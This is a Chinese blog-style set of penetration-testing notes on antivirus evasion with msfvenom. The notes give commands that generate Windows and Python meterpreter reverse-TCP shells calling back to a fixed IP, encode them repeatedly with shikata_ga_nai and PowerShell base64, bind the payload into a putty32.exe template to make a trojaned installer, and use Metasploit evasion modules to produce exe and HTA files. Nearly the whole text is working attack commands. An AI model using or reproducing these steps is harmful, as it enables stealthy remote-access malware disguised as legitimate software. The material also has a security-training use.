免杀2-msf免杀

1. 生成shellcode

内网渗透 day10-msfvenom免杀

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.227.129 LPORT=4444 -f c

2. 生成python脚本

内网渗透 day10-msfvenom免杀

echo 密文 | base64 -d        base64解密

内网渗透 day10-msfvenom免杀

msfvenom -a python -p python/meterpreter/reverse_tcp LHOST=192.168.227.129 LPORT=5555 -f raw > shell.py

raw 原生的可移植的可执行文件或代码

3. 自编码免杀

内网渗透 day10-msfvenom免杀

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.227.129 LPORT=4444 -e x86/shikata_ga_nai -i 9 -f exe -o tt.exe

优秀的编码模块:x86/shikata_ga_nai、cmd/powershell_base64

4. 自捆绑免杀(模版注入)

内网渗透 day10-msfvenom免杀

内网渗透 day10-msfvenom免杀


msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.227.129 LPORT=4444 -x putty32.exe -f exe -o putty.exe

-x 需要的模版

5. 自编码+自捆绑免杀

内网渗透 day10-msfvenom免杀


msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.227.129 LPORT=4444 -x putty32.exe -e x86/shikata_ga_nai -i 15 -f exe -o putty2.exe

6. msf多重免杀

内网渗透 day10-msfvenom免杀


msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.227.129 LPORT=4444 -e cmd/powershell_base64 -i 10 -f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 10 -f exe -o 360.exe

7. evasion逃避模块

search windows/windows

内网渗透 day10-msfvenom免杀

use 0进入evasion中exe模块,并显示需要的参数

内网渗透 day10-msfvenom免杀

设置相关参数

内网渗透 day10-msfvenom免杀

run创建文件后将文件移动到/root/下面

内网渗透 day10-msfvenom免杀


use 1进入evasion中hta模块

hta:HTA是HTML Application的缩写(HTML应用程序),是软件开发的新概念,直接将HTML保存成HTA的格式,就是一个独立的应用软件。

内网渗透 day10-msfvenom免杀


相关文章:

  • 2022-01-17
  • 2021-12-15
  • 2021-09-27
  • 2022-01-12
  • 2021-06-15
  • 2021-08-25
  • 2022-03-07
  • 2022-12-23
猜你喜欢
  • 2021-12-04
  • 2021-11-08
  • 2021-12-05
  • 2022-01-30
  • 2021-12-24
  • 2021-11-18
  • 2021-05-11
相关资源
相似解决方案